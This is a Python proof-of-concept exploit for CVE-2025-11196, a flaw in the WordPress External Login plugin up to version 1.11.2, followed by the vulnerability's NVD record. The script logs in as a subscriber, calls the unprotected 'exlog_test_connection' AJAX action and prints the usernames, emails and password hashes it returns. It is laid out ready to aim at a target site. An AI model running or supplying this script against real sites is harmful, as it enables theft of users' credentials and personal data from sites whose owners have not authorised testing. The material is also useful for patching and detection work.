CVE-2025-11196

# CVE-2025-11196 PoC - External Login Plugin Sensitive Information Exposure # Vulnerability: Missing capability checks and nonce validation in 'exlog_test_connection' AJAX action # Affected: External Login plugin for WordPress <= 1.11.2 # Required: Subscriber-level authenticated access import requests class Exploit: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.session = requests.Session() self.username = username self.password = password self.ajax_url = f"{self.target_url}/wp-admin/admin-ajax.php" def login(self): """Authenticate as a subscriber-level user""" login_data = { 'log': self.username, 'pwd': self.password, 'wp-submit': 'Log In', 'redirect_to': f"{self.target_url}/wp-admin/", 'testcookie': '1' } # Set test cookie first (required by WordPress) self.session.get(f"{self.target_url}/wp-login.php") self.session.cookies.set('wordpress_test_cookie', 'WP%20Cookie%20check') response = self.session.post( f"{self.target_url}/wp-login.php", data=login_data, allow_redirects=False ) if 'wordpress_logged_in' in self.session.cookies.get_dict(): print("[+] Successfully logged in") return True print("[-] Login failed") return False def exploit(self): """Trigger the vulnerable AJAX endpoint to extract sensitive data""" # The exlog_test_connection AJAX action lacks capability checks # It accepts connection parameters and returns database test results # including truncated usernames, emails, and password hashes payload = { 'action': 'exlog_test_connection', # Parameters may vary based on plugin configuration 'db_host': 'localhost', 'db_name': 'external_users', 'db_user': 'ext_user', 'db_pass': 'ext_pass', 'db_table': 'wp_users' } response = self.session.post(self.ajax_url, data=payload) if response.status_code == 200 and response.text: print("[+] Sensitive data extracted:") print(response.text) return response.text print("[-] Exploit failed") return None if __name__ == "__main__": # Usage example exploit = Exploit( target_url="https://target-wordpress-site.com", username="subscriber_user", password="subscriber_password" ) if exploit.login(): exploit.exploit()

{"cve": {"id": "CVE-2025-11196", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:42.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The External Login plugin for WordPress is vulnerable to sensitive information exposure in all versions up to, and including, 1.11.2 due to the 'exlog_test_connection' AJAX action lacking capability checks or nonce validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to query the configured external database and retrieve truncated usernames, email addresses, and password hashes via the diagnostic test results view."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/external-login/trunk/login/db.php#L215", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/external-login/trunk/options/testing_ajax.php#L3", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/external-login/trunk/views/test_results.php#L21", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bdb40f51-dac2-40e7-beb1-154d982f7af3?source=cve", "source": "[email protected]"}]}}